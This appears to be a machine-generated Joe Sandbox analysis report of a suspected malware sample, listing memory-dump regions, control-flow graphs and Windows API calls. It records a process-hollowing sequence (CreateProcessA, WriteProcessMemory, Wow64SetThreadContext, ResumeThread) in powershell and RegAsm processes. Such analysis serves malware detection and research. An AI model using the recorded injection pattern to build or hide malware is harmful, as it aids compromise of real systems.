                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                • String ID:
                                                                                                • API String ID: 2112829910-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AdjustPointer
                                                                                                • String ID:
                                                                                                • API String ID: 1740715915-0
                                                                                                APIs
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • GetLastError.KERNEL32 ref: 6F957991
                                                                                                • __dosmaperr.LIBCMT ref: 6F957998
                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 6F9579D2
                                                                                                • __dosmaperr.LIBCMT ref: 6F9579D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1913693674-0
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 6F958C36
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F958C6E
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F958C8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 158306478-0
                                                                                                APIs
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000), ref: 6F95D92D
                                                                                                • GetLastError.KERNEL32(?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?,?,?,6F95C78B,00000000), ref: 6F95D939
                                                                                                  • Part of subcall function 6F95D8FF: CloseHandle.KERNEL32(FFFFFFFE,6F95D949,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?,?), ref: 6F95D90F
                                                                                                • ___initconout.LIBCMT ref: 6F95D949
                                                                                                  • Part of subcall function 6F95D8C1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F95D8F0,6F95D0C4,?,?,6F95C1E8,?,00000000,00000000,?), ref: 6F95D8D4
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?), ref: 6F95D95E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                • String ID:
                                                                                                • API String ID: 2744216297-0
                                                                                                APIs
                                                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6F9544A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: EncodePointer
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 2118026453-2084237596

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:13
                                                                                                Total number of Limit Nodes:0
                                                                                                execution_graph 11362 4d17d50 11363 4d17d72 11362->11363 11367 4d18bc9 11363->11367 11371 4d18bd8 11363->11371 11364 4d17edb 11369 4d18bd8 11367->11369 11368 4d18c2b 11368->11364 11369->11368 11375 4d18994 11369->11375 11373 4d18c20 11371->11373 11372 4d18c2b 11372->11364 11373->11372 11374 4d18994 LoadLibraryW 11373->11374 11374->11372 11376 4d18de8 LoadLibraryW 11375->11376 11378 4d18e5d 11376->11378 11378->11368

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 667 4d18994-4d18e28 669 4d18e30-4d18e5b LoadLibraryW 667->669 670 4d18e2a-4d18e2d 667->670 671 4d18e64-4d18e81 669->671 672 4d18e5d-4d18e63 669->672 670->669 672->671
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 04D18E4E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.1694072703.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_4d10000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 675 4d18de0-4d18e28 677 4d18e30-4d18e5b LoadLibraryW 675->677 678 4d18e2a-4d18e2d 675->678 679 4d18e64-4d18e81 677->679 680 4d18e5d-4d18e63 677->680 678->677 680->679
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 04D18E4E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.1694072703.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_4d10000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0

                                                                                                Execution Graph

                                                                                                Execution Coverage:8.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:23
                                                                                                Total number of Limit Nodes:2
                                                                                                execution_graph 5593 8b5520 5594 8b5529 5593->5594 5595 8b5531 5594->5595 5597 8b5793 5594->5597 5599 8b579d 5597->5599 5598 8b5e12 5598->5595 5599->5598 5604 8b6768 WriteProcessMemory 5599->5604 5605 8b6770 WriteProcessMemory 5599->5605 5606 8b65d8 Wow64SetThreadContext 5599->5606 5607 8b65d1 Wow64SetThreadContext 5599->5607 5608 8b69f8 5599->5608 5612 8b69ec 5599->5612 5616 8b6528 5599->5616 5620 8b6521 5599->5620 5604->5599 5605->5599 5606->5599 5607->5599 5609 8b6a81 5608->5609 5609->5609 5610 8b6be6 CreateProcessA 5609->5610 5611 8b6c43 5610->5611 5613 8b6a81 CreateProcessA 5612->5613 5615 8b6c43 5613->5615 5617 8b6568 ResumeThread 5616->5617 5619 8b6599 5617->5619 5619->5599 5621 8b6568 ResumeThread 5620->5621 5623 8b6599 5621->5623 5623->5599

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (o^q$(o^q$84^l$84^l$tP^q$tP^q
                                                                                                • API String ID: 0-1240530962

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-3272787073

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (o^q$84^l$tP^q
                                                                                                • API String ID: 0-2373809280
                                                                                                • Opcode ID: 5017b1a3e5b8d2554977ebdd622b9cd164cc3064bfbacff6ff3e97c9f2a41489
                                                                                                • Instruction ID: 37a9ec303c33c8571d1e1716161124928b81258789a660bdfadb3942128c0032
                                                                                                • Opcode Fuzzy Hash: 5017b1a3e5b8d2554977ebdd622b9cd164cc3064bfbacff6ff3e97c9f2a41489
                                                                                                • Instruction Fuzzy Hash: A2419030E4020EDFDB64CF18C984B6ABBB2FB84330F1485ADE4559B251DB71DA41CB91

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$$^q$$^q
                                                                                                • API String ID: 0-2291298209
                                                                                                • Opcode ID: b1c931a0fc08d1f63a679d7af7935c233983f1843cd30db6f4f2b755ebd30222
                                                                                                • Instruction ID: c923c6dd1f162aa9d94dd7726ff3c0e45a57f2e9cb7a7952ca969438031ad66c
                                                                                                • Opcode Fuzzy Hash: b1c931a0fc08d1f63a679d7af7935c233983f1843cd30db6f4f2b755ebd30222
                                                                                                • Instruction Fuzzy Hash: D331C330E0420EDFDBA58F69840177A7BB1AF95760F14406ED844DB292DB35CB41CBA2

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q
                                                                                                • API String ID: 0-2697143702
                                                                                                • Opcode ID: 7caebb67d5bc0299b4b192fa6677d4ce5e178d7f6fd665e0adce21fa2bc9d5b0
                                                                                                • Instruction ID: 0b9e1f38d91fc811ec2e2041545666466c40c6a09be5385ab0b8c7508a08f968
                                                                                                • Opcode Fuzzy Hash: 7caebb67d5bc0299b4b192fa6677d4ce5e178d7f6fd665e0adce21fa2bc9d5b0
                                                                                                • Instruction Fuzzy Hash: CF319C31F4020ECFDB94DB69D54466AB7F2BB84320F24807ED4598B211EB31DA49CBE1

                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 008B6C2E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 1c11ef64a094342a27abcbdc69857ba434666ba93ff6c6ac07276fdfebbef83d
                                                                                                • Instruction ID: f70fe3f816f60e90eb58b17007b1d8926b6d145b3898eb6c8b218bd3ca54a6df
                                                                                                • Opcode Fuzzy Hash: 1c11ef64a094342a27abcbdc69857ba434666ba93ff6c6ac07276fdfebbef83d
                                                                                                • Instruction Fuzzy Hash: 36A14871D002198FDB14DF68C8417DEBBB2FF44314F1485A9E849E7240EB789995CF92

                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 008B6C2E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: acf6cf53f1eda8778df76508b1cdc8fd77151dc06ff79a1e4dd698a4bf6bacc5
                                                                                                • Instruction ID: aa0f94fbcf3294c0c6a37b5a50a76d9ab8f80385e2333d364462c2e91651c8f0
                                                                                                • Opcode Fuzzy Hash: acf6cf53f1eda8778df76508b1cdc8fd77151dc06ff79a1e4dd698a4bf6bacc5
                                                                                                • Instruction Fuzzy Hash: 6B913671D002199FDB10DF68C841BEEBBB2FB48314F1485A9E849E7250EB789995CF92

                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 008B6800
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: b1838b81a474ab2e5a8144ff44e7f85a0ee3c908e55e57ee8b0235882da26523
                                                                                                • Instruction ID: 17a508f77957de885de76084bc768c2005504fc91b1bffe374e5fa03c7e8c395
                                                                                                • Opcode Fuzzy Hash: b1838b81a474ab2e5a8144ff44e7f85a0ee3c908e55e57ee8b0235882da26523
                                                                                                • Instruction Fuzzy Hash: C92168B69003499FCB10DFA9C881BDEBBF4FF48324F108429E559A7341DB789954CBA4

                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 008B6800
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: 34a281ab2c6b748919181bb8e115c2d32eccede17e5d49899e8989a7116f5548
                                                                                                • Instruction ID: b9e97a2655e3955eaf1c8bfb9b9faba95e7604dad4649b5e8510d926324d1c6c
                                                                                                • Opcode Fuzzy Hash: 34a281ab2c6b748919181bb8e115c2d32eccede17e5d49899e8989a7116f5548
                                                                                                • Instruction Fuzzy Hash: 192166B19003099FCB10DFA9C881BDEBBF4FF48320F10842AE958A7350D7789954CBA4

                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 008B6656
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: ac37b1b9b150716ba2173eb9e5ebe7a8b83ecf9b7dfad4eb956d0a4df85109fb
                                                                                                • Instruction ID: d746e735488d9da96b6a3734de4fc88afd68822e2c703228896658779e0e1ee1
                                                                                                • Opcode Fuzzy Hash: ac37b1b9b150716ba2173eb9e5ebe7a8b83ecf9b7dfad4eb956d0a4df85109fb
                                                                                                • Instruction Fuzzy Hash: C72157B59002098FDB10DFA9C5857EEBBF4FF48320F10842AD459A7240D7789A85CFA4

                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 008B6656
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: 11b84b46c76771bc692b67286afbc2f2f5dbba22f3a0b0bbeda322eb127f9c17
                                                                                                • Instruction ID: 608adae44c02043e1c8cc71d216c1bb70dedd031ea972cad4fb425a3607c6e32
                                                                                                • Opcode Fuzzy Hash: 11b84b46c76771bc692b67286afbc2f2f5dbba22f3a0b0bbeda322eb127f9c17
                                                                                                • Instruction Fuzzy Hash: AB2138B19002098FDB10DFAAC4857EEBBF4EF49324F148429D559A7240DB78A984CFA4

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: 5adb85ba95ce3a443110e74d55f5a41d653981591c3cf82e981c351a73392260
                                                                                                • Instruction ID: e5db904731ac7af92543c7c76af3a7a67cb68802055c090431c12b6362603a48
                                                                                                • Opcode Fuzzy Hash: 5adb85ba95ce3a443110e74d55f5a41d653981591c3cf82e981c351a73392260
                                                                                                • Instruction Fuzzy Hash: 4B1158B59002488FDB20DFA9C5457DEFBF4EB48324F20881AC159A7254D738A644CFA4

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: 4fc674271029c86b6820c9ed7e870b69aaa6427278b7e7b02d92e69d131ce3b2
                                                                                                • Instruction ID: 2d479a76f055014b6324f6bf0cc0b4b8f3f658dd23ef3f996fb65d667c528171
                                                                                                • Opcode Fuzzy Hash: 4fc674271029c86b6820c9ed7e870b69aaa6427278b7e7b02d92e69d131ce3b2
                                                                                                • Instruction Fuzzy Hash: FC1136B19002488FDB20DFAAC4457DEFBF4EB88324F248429D559A7254DB79A944CFA4

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1829152667.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_61d000_powershell.jbxd
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1829152667.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_61d000_powershell.jbxd
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-3272787073
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                • API String ID: 0-2049395529
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002B.00000002.2108864225.0000000001439000.00000004.00000020.00020000.00000000.sdmp, Offset: 01439000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_43_2_1439000_RegAsm.jbxd

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00408624
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040862E
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087FA
                                                                                                • GetForegroundWindow.USER32 ref: 00408974
                                                                                                  • Part of subcall function 0040B7B0: FreeLibrary.KERNEL32(00408A31), ref: 0040B7B6
                                                                                                  • Part of subcall function 0040B7B0: FreeLibrary.KERNEL32 ref: 0040B7D7
                                                                                                • ExitProcess.KERNEL32 ref: 00408A4A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                • String ID: b]u)$}$}
                                                                                                • API String ID: 3676751680-2900034282

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 88 43e110-43e142 LdrInitializeThunk
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(0044148A,?,00000018,?,?,00000018,?,?,?), ref: 0043E13E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 31 409d1e-409d34 32 409d40-409d52 31->32 32->32 33 409d54-409d7e 32->33 34 409d80-409d92 33->34 34->34 35 409d94-409e13 LoadLibraryExW call 43d960 34->35 38 409e20-409e32 35->38 38->38 39 409e34-409e5e 38->39 40 409e60-409e72 39->40 40->40 41 409e74-409e80 LoadLibraryExW call 43d960 40->41 43 409e85-409e98 41->43
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 00409D98
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 00409E78
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: CKI
                                                                                                • API String ID: 1029625771-2433779057

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 48 43e34b-43e357 49 43e360-43e37a 48->49 49->49 50 43e37c-43e409 GetForegroundWindow call 4402f0 49->50
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 0043E3BA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: ForegroundWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2020703349-3019521637

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 54 40ef53-40f0b5 CoInitializeEx * 2
                                                                                                APIs
                                                                                                • CoInitializeEx.OLE32(00000000,00000002), ref: 0040EF57
                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040F09C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 55 40ec77-40ecbb CoInitializeSecurity * 2
                                                                                                APIs
                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040EC89
